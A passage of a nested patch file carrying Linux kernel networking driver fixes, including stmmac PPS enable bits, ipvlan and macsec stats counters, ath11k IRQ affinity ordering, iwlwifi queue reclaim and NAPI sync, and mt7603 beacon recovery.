+-		pm_request_resume(&tp->pci_dev->dev);
++		pm_request_resume(d);
++		netif_wake_queue(tp->dev);
+ 	} else {
+-		pm_runtime_idle(&tp->pci_dev->dev);
++		/* In few cases rx is broken after link-down otherwise */
++		if (rtl_is_8125(tp))
++			rtl_reset_work(tp);
++		pm_runtime_idle(d);
+ 	}
+ 
+ 	phy_print_status(tp->phydev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+index 1913385df6856..880a75bf2eb1f 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+@@ -222,7 +222,7 @@
+ 	((val) << XGMAC_PPS_MINIDX(x))
+ #define XGMAC_PPSCMD_START		0x2
+ #define XGMAC_PPSCMD_STOP		0x5
+-#define XGMAC_PPSEN0			BIT(4)
++#define XGMAC_PPSENx(x)			BIT(4 + (x) * 8)
+ #define XGMAC_PPSx_TARGET_TIME_SEC(x)	(0x00000d80 + (x) * 0x10)
+ #define XGMAC_PPSx_TARGET_TIME_NSEC(x)	(0x00000d84 + (x) * 0x10)
+ #define XGMAC_TRGTBUSY0			BIT(31)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index c6c4d7948fe5f..f30e08a106cbe 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -1135,7 +1135,19 @@ static int dwxgmac2_flex_pps_config(void __iomem *ioaddr, int index,
+ 
+ 	val |= XGMAC_PPSCMDx(index, XGMAC_PPSCMD_START);
+ 	val |= XGMAC_TRGTMODSELx(index, XGMAC_PPSCMD_START);
+-	val |= XGMAC_PPSEN0;
++
++	/* XGMAC Core has 4 PPS outputs at most.
++	 *
++	 * Prior XGMAC Core 3.20, Fixed mode or Flexible mode are selectable for
++	 * PPS0 only via PPSEN0. PPS{1,2,3} are in Flexible mode by default,
++	 * and can not be switched to Fixed mode, since PPSEN{1,2,3} are
++	 * read-only reserved to 0.
++	 * But we always set PPSEN{1,2,3} do not make things worse ;-)
++	 *
++	 * From XGMAC Core 3.20 and later, PPSEN{0,1,2,3} are writable and must
++	 * be set, or the PPS outputs stay in Fixed PPS mode by default.
++	 */
++	val |= XGMAC_PPSENx(index);
+ 
+ 	writel(cfg->start.tv_sec, ioaddr + XGMAC_PPSx_TARGET_TIME_SEC(index));
+ 
+diff --git a/drivers/net/ethernet/toshiba/spider_net.c b/drivers/net/ethernet/toshiba/spider_net.c
+index 50d7eacfec582..87e67121477cb 100644
+--- a/drivers/net/ethernet/toshiba/spider_net.c
++++ b/drivers/net/ethernet/toshiba/spider_net.c
+@@ -2332,7 +2332,7 @@ spider_net_alloc_card(void)
+ 	struct spider_net_card *card;
+ 
+ 	netdev = alloc_etherdev(struct_size(card, darray,
+-					    tx_descriptors + rx_descriptors));
++					    size_add(tx_descriptors, rx_descriptors)));
+ 	if (!netdev)
+ 		return NULL;
+ 
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index 59e29e08398a0..b29b7d97b7739 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -441,12 +441,12 @@ static int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ 
+ 	err = ip_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out;
+ err:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out:
+ 	return ret;
+@@ -482,12 +482,12 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 
+ 	err = ip6_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out;
+ err:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out:
+ 	return ret;
+diff --git a/drivers/net/ipvlan/ipvlan_main.c b/drivers/net/ipvlan/ipvlan_main.c
+index cd16bc8bf154c..fbf2d5b67aafa 100644
+--- a/drivers/net/ipvlan/ipvlan_main.c
++++ b/drivers/net/ipvlan/ipvlan_main.c
+@@ -324,6 +324,7 @@ static void ipvlan_get_stats64(struct net_device *dev,
+ 		s->rx_dropped = rx_errs;
+ 		s->tx_dropped = tx_drps;
+ 	}
++	s->tx_errors = DEV_STATS_READ(dev, tx_errors);
+ }
+ 
+ static int ipvlan_vlan_rx_add_vid(struct net_device *dev, __be16 proto, u16 vid)
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 81453e84b6413..209ee9f352754 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -3664,9 +3664,9 @@ static void macsec_get_stats64(struct net_device *dev,
+ 
+ 	dev_fetch_sw_netstats(s, dev->tstats);
+ 
+-	s->rx_dropped = atomic_long_read(&dev->stats.__rx_dropped);
+-	s->tx_dropped = atomic_long_read(&dev->stats.__tx_dropped);
+-	s->rx_errors = atomic_long_read(&dev->stats.__rx_errors);
++	s->rx_dropped = DEV_STATS_READ(dev, rx_dropped);
++	s->tx_dropped = DEV_STATS_READ(dev, tx_dropped);
++	s->rx_errors = DEV_STATS_READ(dev, rx_errors);
+ }
+ 
+ static int macsec_get_iflink(const struct net_device *dev)
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index cb77dd6ce9665..21c6b36dc6ebb 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -8549,6 +8549,14 @@ static int ath11k_mac_op_get_txpower(struct ieee80211_hw *hw,
+ 	if (ar->state != ATH11K_STATE_ON)
+ 		goto err_fallback;
+ 
++	/* Firmware doesn't provide Tx power during CAC hence no need to fetch
++	 * the stats.
++	 */
++	if (test_bit(ATH11K_CAC_RUNNING, &ar->dev_flags)) {
++		mutex_unlock(&ar->conf_mutex);
++		return -EAGAIN;
++	}
++
+ 	req_param.pdev_id = ar->pdev->pdev_id;
+ 	req_param.stats_id = WMI_REQUEST_PDEV_STAT;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 3953ebd551bf8..79d2876a46b53 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -853,10 +853,16 @@ unsupported_wcn6855_soc:
+ 	if (ret)
+ 		goto err_pci_disable_msi;
+ 
++	ret = ath11k_pci_set_irq_affinity_hint(ab_pci, cpumask_of(0));
++	if (ret) {
++		ath11k_err(ab, "failed to set irq affinity %d\n", ret);
++		goto err_pci_disable_msi;
++	}
++
+ 	ret = ath11k_mhi_register(ab_pci);
+ 	if (ret) {
+ 		ath11k_err(ab, "failed to register mhi: %d\n", ret);
+-		goto err_pci_disable_msi;
++		goto err_irq_affinity_cleanup;
+ 	}
+ 
+ 	ret = ath11k_hal_srng_init(ab);
+@@ -877,12 +883,6 @@ unsupported_wcn6855_soc:
+ 		goto err_ce_free;
+ 	}
+ 
+-	ret = ath11k_pci_set_irq_affinity_hint(ab_pci, cpumask_of(0));
+-	if (ret) {
+-		ath11k_err(ab, "failed to set irq affinity %d\n", ret);
+-		goto err_free_irq;
+-	}
+-
+ 	/* kernel may allocate a dummy vector before request_irq and
+ 	 * then allocate a real vector when request_irq is called.
+ 	 * So get msi_data here again to avoid spurious interrupt
+@@ -891,19 +891,16 @@ unsupported_wcn6855_soc:
+ 	ret = ath11k_pci_config_msi_data(ab_pci);
+ 	if (ret) {
+ 		ath11k_err(ab, "failed to config msi_data: %d\n", ret);
+-		goto err_irq_affinity_cleanup;
++		goto err_free_irq;
+ 	}
+ 
+ 	ret = ath11k_core_init(ab);
+ 	if (ret) {
+ 		ath11k_err(ab, "failed to init core: %d\n", ret);
+-		goto err_irq_affinity_cleanup;
++		goto err_free_irq;
+ 	}
+ 	return 0;
+ 
+-err_irq_affinity_cleanup:
+-	ath11k_pci_set_irq_affinity_hint(ab_pci, NULL);
+-
+ err_free_irq:
+ 	ath11k_pcic_free_irq(ab);
+ 
+@@ -916,6 +913,9 @@ err_hal_srng_deinit:
+ err_mhi_unregister:
+ 	ath11k_mhi_unregister(ab_pci);
+ 
++err_irq_affinity_cleanup:
++	ath11k_pci_set_irq_affinity_hint(ab_pci, NULL);
++
+ err_pci_disable_msi:
+ 	ath11k_pci_free_msi(ab_pci);
+ 
+diff --git a/drivers/net/wireless/ath/dfs_pattern_detector.c b/drivers/net/wireless/ath/dfs_pattern_detector.c
+index 27f4d74a41c80..2788a1b06c17c 100644
+--- a/drivers/net/wireless/ath/dfs_pattern_detector.c
++++ b/drivers/net/wireless/ath/dfs_pattern_detector.c
+@@ -206,7 +206,7 @@ channel_detector_create(struct dfs_pattern_detector *dpd, u16 freq)
+ 
+ 	INIT_LIST_HEAD(&cd->head);
+ 	cd->freq = freq;
+-	cd->detectors = kmalloc_array(dpd->num_radar_types,
++	cd->detectors = kcalloc(dpd->num_radar_types,
+ 				      sizeof(*cd->detectors), GFP_ATOMIC);
+ 	if (cd->detectors == NULL)
+ 		goto fail;
+diff --git a/drivers/net/wireless/intel/iwlwifi/dvm/tx.c b/drivers/net/wireless/intel/iwlwifi/dvm/tx.c
+index 60a7b61d59aa3..ca1daec641c4f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/dvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/dvm/tx.c
+@@ -3,6 +3,7 @@
+  *
+  * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved.
+  * Copyright (C) 2019 Intel Corporation
++ * Copyright (C) 2023 Intel Corporation
+  *****************************************************************************/
+ 
+ #include <linux/kernel.h>
+@@ -1169,7 +1170,7 @@ void iwlagn_rx_reply_tx(struct iwl_priv *priv, struct iwl_rx_cmd_buffer *rxb)
+ 			iwlagn_check_ratid_empty(priv, sta_id, tid);
+ 		}
+ 
+-		iwl_trans_reclaim(priv->trans, txq_id, ssn, &skbs);
++		iwl_trans_reclaim(priv->trans, txq_id, ssn, &skbs, false);
+ 
+ 		freed = 0;
+ 
+@@ -1315,7 +1316,7 @@ void iwlagn_rx_reply_compressed_ba(struct iwl_priv *priv,
+ 	 * block-ack window (we assume that they've been successfully
+ 	 * transmitted ... if not, it's too late anyway). */
+ 	iwl_trans_reclaim(priv->trans, scd_flow, ba_resp_scd_ssn,
+-			  &reclaimed_skbs);
++			  &reclaimed_skbs, false);
+ 
+ 	IWL_DEBUG_TX_REPLY(priv, "REPLY_COMPRESSED_BA [%d] Received from %pM, "
+ 			   "sta_id = %d\n",
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h b/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h
+index ba538d70985f4..39bee9c00e071 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h
+@@ -13,6 +13,7 @@
+ #define IWL_FW_INI_DOMAIN_ALWAYS_ON		0
+ #define IWL_FW_INI_REGION_ID_MASK		GENMASK(15, 0)
+ #define IWL_FW_INI_REGION_DUMP_POLICY_MASK	GENMASK(31, 16)
++#define IWL_FW_INI_PRESET_DISABLE		0xff
+ 
+ /**
+  * struct iwl_fw_ini_hcmd
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h
+index 128059ca77e60..06fb7d6653905 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause */
+ /*
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2023 Intel Corporation
+  */
+ #ifndef __iwl_dbg_tlv_h__
+ #define __iwl_dbg_tlv_h__
+@@ -10,7 +10,8 @@
+ #include <fw/file.h>
+ #include <fw/api/dbg-tlv.h>
+ 
+-#define IWL_DBG_TLV_MAX_PRESET 15
++#define IWL_DBG_TLV_MAX_PRESET	15
++#define ENABLE_INI		(IWL_DBG_TLV_MAX_PRESET + 1)
+ 
+ /**
+  * struct iwl_dbg_tlv_node - debug TLV node
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+index a2203f661321c..5eba1a355f043 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+@@ -1722,6 +1722,22 @@ struct iwl_drv *iwl_drv_start(struct iwl_trans *trans)
+ #endif
+ 
+ 	drv->trans->dbg.domains_bitmap = IWL_TRANS_FW_DBG_DOMAIN(drv->trans);
++	if (iwlwifi_mod_params.enable_ini != ENABLE_INI) {
++		/* We have a non-default value in the module parameter,
++		 * take its value
++		 */
++		drv->trans->dbg.domains_bitmap &= 0xffff;
++		if (iwlwifi_mod_params.enable_ini != IWL_FW_INI_PRESET_DISABLE) {
++			if (iwlwifi_mod_params.enable_ini > ENABLE_INI) {
++				IWL_ERR(trans,
++					"invalid enable_ini module parameter value: max = %d, using 0 instead\n",
++					ENABLE_INI);
++				iwlwifi_mod_params.enable_ini = 0;
++			}
++			drv->trans->dbg.domains_bitmap =
++				BIT(IWL_FW_DBG_DOMAIN_POS + iwlwifi_mod_params.enable_ini);
++		}
++	}
+ 
+ 	ret = iwl_request_firmware(drv, true);
+ 	if (ret) {
+@@ -1770,8 +1786,6 @@ void iwl_drv_stop(struct iwl_drv *drv)
+ 	kfree(drv);
+ }
+ 
+-#define ENABLE_INI	(IWL_DBG_TLV_MAX_PRESET + 1)
+-
+ /* shared module parameters */
+ struct iwl_mod_params iwlwifi_mod_params = {
+ 	.fw_restart = true,
+@@ -1891,38 +1905,7 @@ module_param_named(uapsd_disable, iwlwifi_mod_params.uapsd_disable, uint, 0644);
+ MODULE_PARM_DESC(uapsd_disable,
+ 		 "disable U-APSD functionality bitmap 1: BSS 2: P2P Client (default: 3)");
+ 
+-static int enable_ini_set(const char *arg, const struct kernel_param *kp)
+-{
+-	int ret = 0;
+-	bool res;
+-	__u32 new_enable_ini;
+-
+-	/* in case the argument type is a number */
+-	ret = kstrtou32(arg, 0, &new_enable_ini);
+-	if (!ret) {
+-		if (new_enable_ini > ENABLE_INI) {
+-			pr_err("enable_ini cannot be %d, in range 0-16\n", new_enable_ini);
+-			return -EINVAL;
+-		}
+-		goto out;
+-	}
+-
+-	/* in case the argument type is boolean */
+-	ret = kstrtobool(arg, &res);
+-	if (ret)
+-		return ret;
+-	new_enable_ini = (res ? ENABLE_INI : 0);
+-
+-out:
+-	iwlwifi_mod_params.enable_ini = new_enable_ini;
+-	return 0;
+-}
+-
+-static const struct kernel_param_ops enable_ini_ops = {
+-	.set = enable_ini_set
+-};
+-
+-module_param_cb(enable_ini, &enable_ini_ops, &iwlwifi_mod_params.enable_ini, 0644);
++module_param_named(enable_ini, iwlwifi_mod_params.enable_ini, uint, 0444);
+ MODULE_PARM_DESC(enable_ini,
+ 		 "0:disable, 1-15:FW_DBG_PRESET Values, 16:enabled without preset value defined,"
+ 		 "Debug INI TLV FW debug infrastructure (default: 16)");
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+index d659ccd065f78..70022cadee35b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+@@ -56,6 +56,10 @@
+  *	6) Eventually, the free function will be called.
+  */
+ 
++/* default preset 0 (start from bit 16)*/
++#define IWL_FW_DBG_DOMAIN_POS	16
++#define IWL_FW_DBG_DOMAIN	BIT(IWL_FW_DBG_DOMAIN_POS)
++
+ #define IWL_TRANS_FW_DBG_DOMAIN(trans)	IWL_FW_INI_DOMAIN_ALWAYS_ON
+ 
+ #define FH_RSCSR_FRAME_SIZE_MSK		0x00003FFF	/* bits 0-13 */
+@@ -563,7 +567,7 @@ struct iwl_trans_ops {
+ 	int (*tx)(struct iwl_trans *trans, struct sk_buff *skb,
+ 		  struct iwl_device_tx_cmd *dev_cmd, int queue);
+ 	void (*reclaim)(struct iwl_trans *trans, int queue, int ssn,
+-			struct sk_buff_head *skbs);
++			struct sk_buff_head *skbs, bool is_flush);
+ 
+ 	void (*set_q_ptrs)(struct iwl_trans *trans, int queue, int ptr);
+ 
+@@ -1187,14 +1191,15 @@ static inline int iwl_trans_tx(struct iwl_trans *trans, struct sk_buff *skb,
+ }
+ 
+ static inline void iwl_trans_reclaim(struct iwl_trans *trans, int queue,
+-				     int ssn, struct sk_buff_head *skbs)
++				     int ssn, struct sk_buff_head *skbs,
++				     bool is_flush)
+ {
+ 	if (WARN_ON_ONCE(trans->state != IWL_TRANS_FW_ALIVE)) {
+ 		IWL_ERR(trans, "%s bad state = %d\n", __func__, trans->state);
+ 		return;
+ 	}
+ 
+-	trans->ops->reclaim(trans, queue, ssn, skbs);
++	trans->ops->reclaim(trans, queue, ssn, skbs, is_flush);
+ }
+ 
+ static inline void iwl_trans_set_q_ptrs(struct iwl_trans *trans, int queue,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 2d01f6226b7c6..618355ecd9d7b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -1572,7 +1572,7 @@ static void iwl_mvm_rx_tx_cmd_single(struct iwl_mvm *mvm,
+ 	seq_ctl = le16_to_cpu(tx_resp->seq_ctl);
+ 
+ 	/* we can free until ssn % q.n_bd not inclusive */
+-	iwl_trans_reclaim(mvm->trans, txq_id, ssn, &skbs);
++	iwl_trans_reclaim(mvm->trans, txq_id, ssn, &skbs, false);
+ 
+ 	while (!skb_queue_empty(&skbs)) {
+ 		struct sk_buff *skb = __skb_dequeue(&skbs);
+@@ -1923,7 +1923,7 @@ static void iwl_mvm_tx_reclaim(struct iwl_mvm *mvm, int sta_id, int tid,
+ 	 * block-ack window (we assume that they've been successfully
+ 	 * transmitted ... if not, it's too late anyway).
+ 	 */
+-	iwl_trans_reclaim(mvm->trans, txq, index, &reclaimed_skbs);
++	iwl_trans_reclaim(mvm->trans, txq, index, &reclaimed_skbs, is_flush);
+ 
+ 	skb_queue_walk(&reclaimed_skbs, skb) {
+ 		struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb);
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+index f7e4f868363df..69b95ad5993b0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+@@ -497,6 +497,7 @@ int iwl_pcie_rx_stop(struct iwl_trans *trans);
+ void iwl_pcie_rx_free(struct iwl_trans *trans);
+ void iwl_pcie_free_rbs_pool(struct iwl_trans *trans);
+ void iwl_pcie_rx_init_rxb_lists(struct iwl_rxq *rxq);
++void iwl_pcie_rx_napi_sync(struct iwl_trans *trans);
+ void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans, gfp_t priority,
+ 			    struct iwl_rxq *rxq);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index b455e981faa1f..90a46faaaffdf 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
+ /*
+- * Copyright (C) 2003-2014, 2018-2022 Intel Corporation
++ * Copyright (C) 2003-2014, 2018-2023 Intel Corporation
+  * Copyright (C) 2013-2015 Intel Mobile Communications GmbH
+  * Copyright (C) 2016-2017 Intel Deutschland GmbH
+  */
+@@ -1053,6 +1053,22 @@ static int iwl_pcie_napi_poll_msix(struct napi_struct *napi, int budget)
+ 	return ret;
+ }
+ 
++void iwl_pcie_rx_napi_sync(struct iwl_trans *trans)
++{
++	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
++	int i;
++
++	if (unlikely(!trans_pcie->rxq))
++		return;
++
++	for (i = 0; i < trans->num_rx_queues; i++) {
++		struct iwl_rxq *rxq = &trans_pcie->rxq[i];
++
++		if (rxq && rxq->napi.poll)
++			napi_synchronize(&rxq->napi);
++	}
++}
++
+ static int _iwl_pcie_rx_init(struct iwl_trans *trans)
+ {
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c
+index 94f40c4d24217..8b9e4b9c5a2e9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans-gen2.c
+@@ -156,6 +156,8 @@ void _iwl_trans_pcie_gen2_stop_device(struct iwl_trans *trans)
+ 	if (test_and_clear_bit(STATUS_DEVICE_ENABLED, &trans->status)) {
+ 		IWL_DEBUG_INFO(trans,
+ 			       "DEVICE_ENABLED bit was set and is now cleared\n");
++		iwl_pcie_synchronize_irqs(trans);
++		iwl_pcie_rx_napi_sync(trans);
+ 		iwl_txq_gen2_tx_free(trans);
+ 		iwl_pcie_rx_stop(trans);
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 8e95225cdd605..39ab6526e6b85 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -1261,6 +1261,8 @@ static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+ 	if (test_and_clear_bit(STATUS_DEVICE_ENABLED, &trans->status)) {
+ 		IWL_DEBUG_INFO(trans,
+ 			       "DEVICE_ENABLED bit was set and is now cleared\n");
++		iwl_pcie_synchronize_irqs(trans);
++		iwl_pcie_rx_napi_sync(trans);
+ 		iwl_pcie_tx_stop(trans);
+ 		iwl_pcie_rx_stop(trans);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/queue/tx.c b/drivers/net/wireless/intel/iwlwifi/queue/tx.c
+index 726185d6fab8b..8cf206837eeea 100644
+--- a/drivers/net/wireless/intel/iwlwifi/queue/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/queue/tx.c
+@@ -1551,7 +1551,7 @@ void iwl_txq_progress(struct iwl_txq *txq)
+ 
+ /* Frees buffers until index _not_ inclusive */
+ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+-		     struct sk_buff_head *skbs)
++		     struct sk_buff_head *skbs, bool is_flush)
+ {
+ 	struct iwl_txq *txq = trans->txqs.txq[txq_id];
+ 	int tfd_num = iwl_txq_get_cmd_index(txq, ssn);
+@@ -1622,9 +1622,11 @@ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+ 	if (iwl_txq_space(trans, txq) > txq->low_mark &&
+ 	    test_bit(txq_id, trans->txqs.queue_stopped)) {
+ 		struct sk_buff_head overflow_skbs;
++		struct sk_buff *skb;
+ 
+ 		__skb_queue_head_init(&overflow_skbs);
+-		skb_queue_splice_init(&txq->overflow_q, &overflow_skbs);
++		skb_queue_splice_init(&txq->overflow_q,
++				      is_flush ? skbs : &overflow_skbs);
+ 
+ 		/*
+ 		 * We are going to transmit from the overflow queue.
+@@ -1644,8 +1646,7 @@ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+ 		 */
+ 		spin_unlock_bh(&txq->lock);
+ 
+-		while (!skb_queue_empty(&overflow_skbs)) {
+-			struct sk_buff *skb = __skb_dequeue(&overflow_skbs);
++		while ((skb = __skb_dequeue(&overflow_skbs))) {
+ 			struct iwl_device_tx_cmd *dev_cmd_ptr;
+ 
+ 			dev_cmd_ptr = *(void **)((u8 *)skb->cb +
+diff --git a/drivers/net/wireless/intel/iwlwifi/queue/tx.h b/drivers/net/wireless/intel/iwlwifi/queue/tx.h
+index eca53bfd326d1..ceb6812fe20b2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/queue/tx.h
++++ b/drivers/net/wireless/intel/iwlwifi/queue/tx.h
+@@ -173,7 +173,7 @@ void iwl_txq_gen1_update_byte_cnt_tbl(struct iwl_trans *trans,
+ 				      struct iwl_txq *txq, u16 byte_cnt,
+ 				      int num_tbs);
+ void iwl_txq_reclaim(struct iwl_trans *trans, int txq_id, int ssn,
+-		     struct sk_buff_head *skbs);
++		     struct sk_buff_head *skbs, bool is_flush);
+ void iwl_txq_set_q_ptrs(struct iwl_trans *trans, int txq_id, int ptr);
+ void iwl_trans_txq_freeze_timer(struct iwl_trans *trans, unsigned long txqs,
+ 				bool freeze);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c b/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c
+index b65b0a88c1ded..808466b7de472 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/beacon.c
+@@ -9,6 +9,23 @@ struct beacon_bc_data {
+ 	int count[MT7603_MAX_INTERFACES];
+ };
+ 
++static void
++mt7603_mac_stuck_beacon_recovery(struct mt7603_dev *dev)
++{
++	if (dev->beacon_check % 5 != 4)
++		return;
++
++	mt76_clear(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_EN);
++	mt76_set(dev, MT_SCH_4, MT_SCH_4_RESET);
++	mt76_clear(dev, MT_SCH_4, MT_SCH_4_RESET);
++	mt76_set(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_EN);
++
++	mt76_set(dev, MT_WF_CFG_OFF_WOCCR, MT_WF_CFG_OFF_WOCCR_TMAC_GC_DIS);
++	mt76_set(dev, MT_ARB_SCR, MT_ARB_SCR_TX_DISABLE);
++	mt76_clear(dev, MT_ARB_SCR, MT_ARB_SCR_TX_DISABLE);
++	mt76_clear(dev, MT_WF_CFG_OFF_WOCCR, MT_WF_CFG_OFF_WOCCR_TMAC_GC_DIS);
++}
++
+ static void
+ mt7603_update_beacon_iter(void *priv, u8 *mac, struct ieee80211_vif *vif)
+ {
+@@ -16,6 +33,8 @@ mt7603_update_beacon_iter(void *priv, u8 *mac, struct ieee80211_vif *vif)
+ 	struct mt76_dev *mdev = &dev->mt76;
+ 	struct mt7603_vif *mvif = (struct mt7603_vif *)vif->drv_priv;
+ 	struct sk_buff *skb = NULL;
++	u32 om_idx = mvif->idx;
++	u32 val;
+ 
+ 	if (!(mdev->beacon_mask & BIT(mvif->idx)))
+ 		return;
+@@ -24,20 +43,33 @@ mt7603_update_beacon_iter(void *priv, u8 *mac, struct ieee80211_vif *vif)
+ 	if (!skb)
+ 		return;
+ 
+-	mt76_tx_queue_skb(dev, dev->mphy.q_tx[MT_TXQ_BEACON],
+-			  MT_TXQ_BEACON, skb, &mvif->sta.wcid, NULL);
++	if (om_idx)
++		om_idx |= 0x10;
++	val = MT_DMA_FQCR0_BUSY | MT_DMA_FQCR0_MODE |
++		FIELD_PREP(MT_DMA_FQCR0_TARGET_BSS, om_idx) |
++		FIELD_PREP(MT_DMA_FQCR0_DEST_PORT_ID, 3) |
++		FIELD_PREP(MT_DMA_FQCR0_DEST_QUEUE_ID, 8);
+ 
+ 	spin_lock_bh(&dev->ps_lock);
+-	mt76_wr(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY |
+-		FIELD_PREP(MT_DMA_FQCR0_TARGET_WCID, mvif->sta.wcid.idx) |
+-		FIELD_PREP(MT_DMA_FQCR0_TARGET_QID,
+-			   dev->mphy.q_tx[MT_TXQ_CAB]->hw_idx) |
+-		FIELD_PREP(MT_DMA_FQCR0_DEST_PORT_ID, 3) |
+-		FIELD_PREP(MT_DMA_FQCR0_DEST_QUEUE_ID, 8));
+ 
+-	if (!mt76_poll(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY, 0, 5000))
++	mt76_wr(dev, MT_DMA_FQCR0, val |
++		FIELD_PREP(MT_DMA_FQCR0_TARGET_QID, MT_TX_HW_QUEUE_BCN));
++	if (!mt76_poll(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY, 0, 5000)) {
+ 		dev->beacon_check = MT7603_WATCHDOG_TIMEOUT;
++		goto out;
++	}
++
++	mt76_wr(dev, MT_DMA_FQCR0, val |
++		FIELD_PREP(MT_DMA_FQCR0_TARGET_QID, MT_TX_HW_QUEUE_BMC));
++	if (!mt76_poll(dev, MT_DMA_FQCR0, MT_DMA_FQCR0_BUSY, 0, 5000)) {
